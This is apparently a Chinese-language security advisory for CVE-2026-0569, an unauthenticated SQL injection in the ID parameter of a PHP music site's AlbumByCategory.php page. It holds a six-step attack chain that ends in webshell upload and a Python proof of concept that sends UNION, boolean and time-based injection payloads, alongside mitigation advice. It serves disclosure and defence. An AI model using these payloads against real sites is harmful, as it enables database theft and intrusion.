CVE-2026-0569 code-projects Online Music Site 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-0569

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Music Site 1.0

漏洞概述

CVE-2026-0569是code-projects在线音乐网站1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/Frontend/AlbumByCategory.php文件中，由于对用户输入的ID参数缺乏有效的过滤和验证，攻击者可以通过构造恶意SQL语句来操纵数据库查询。漏洞的CVSS评分为7.3，属于高危级别，攻击向量为网络形式，无需任何认证即可发起攻击。此漏洞已被公开披露，可能被恶意利用来获取数据库中的敏感信息，包括用户账户数据、音乐文件信息等。对于运行该应用的服务器，攻击者可能进一步利用获取的数据进行横向移动或更深层次的入侵。

技术细节

该SQL注入漏洞存在于Online Music Site 1.0的/Frontend/AlbumByCategory.php文件中。漏洞的根本原因是对用户可控的ID参数没有进行充分的输入验证和SQL语句参数化处理。攻击者可以通过HTTP请求向该文件传递精心构造的SQL payload，利用UNION SELECT、布尔盲注或时间盲注等技术从数据库中提取敏感信息。受影响的数据库可能包含用户表、管理员表、音乐专辑信息等。由于该应用使用PHP开发且可能使用MySQL数据库，攻击者成功利用此漏洞后可能获取数据库管理权限，甚至通过OUTFILE或INTO DUMPFILE等语句向服务器写入恶意文件，实现远程代码执行。攻击者首先需要识别出存在漏洞的参数位置，然后构造相应的SQL注入语句进行测试和利用。

攻击链分析

STEP 1

步骤1

攻击者识别目标应用为code-projects Online Music Site 1.0

STEP 2

步骤2

访问/Frontend/AlbumByCategory.php页面并分析ID参数

STEP 3

步骤3

构造SQL注入payload，如1' OR '1'='1测试注入点

STEP 4

步骤4

利用UNION注入或盲注技术提取数据库信息

STEP 5

步骤5

获取用户凭据、管理员账户等敏感数据

STEP 6

步骤6

可能通过OUTFILE写入webshell实现RCE

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-0569 SQL Injection PoC
# Target: code-projects Online Music Site 1.0
# Vulnerability: SQL Injection in /Frontend/AlbumByCategory.php (ID parameter)

target_url = "http://target-site.com/Frontend/AlbumByCategory.php"

# Basic SQL Injection test payload
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT NULL-- -",
    "1' AND SLEEP(5)-- -",
    "1' UNION SELECT 1,2,3,4,5,6,7,8-- -"
]

print("[*] CVE-2026-0569 SQL Injection PoC")
print(f"[*] Target: {target_url}")

for payload in payloads:
    params = {"ID": payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[+] Sent payload: {payload}")
        print(f"[+] Status code: {response.status_code}")
        print(f"[+] Response length: {len(response.text)}")
        
        # Check for SQL error indicators
        if "sql" in response.text.lower() or "mysql" in response.text.lower():
            print("[!] SQL error detected - vulnerability confirmed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

print("\n[*] Manual verification recommended")
print("[*] Try: /Frontend/AlbumByCategory.php?ID=1' UNION SELECT database()-- -")

影响范围

code-projects Online Music Site 1.0

防御指南

临时缓解措施

在修复前，可临时采取以下措施：1) 使用WAF规则阻止可疑的SQL注入请求；2) 对AlbumByCategory.php文件设置访问控制，限制只有授权用户可访问；3) 启用Web应用日志监控，及时发现异常请求；4) 考虑暂时下线受影响的页面功能，待修复后再重新启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0569
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0569
3 Details https://www.cvedetails.com/cve/CVE-2026-0569/
4 VulDB https://vuldb.com/cve/CVE-2026-0569
5 Link https://code-projects.org/
6 Link https://github.com/Limingqian123/CVE/issues/16
7 Link https://vuldb.com/?ctiid.339381
8 Link https://vuldb.com/?id.339381
9 Link https://vuldb.com/?submit.729252
10 Link https://github.com/Limingqian123/CVE/issues/16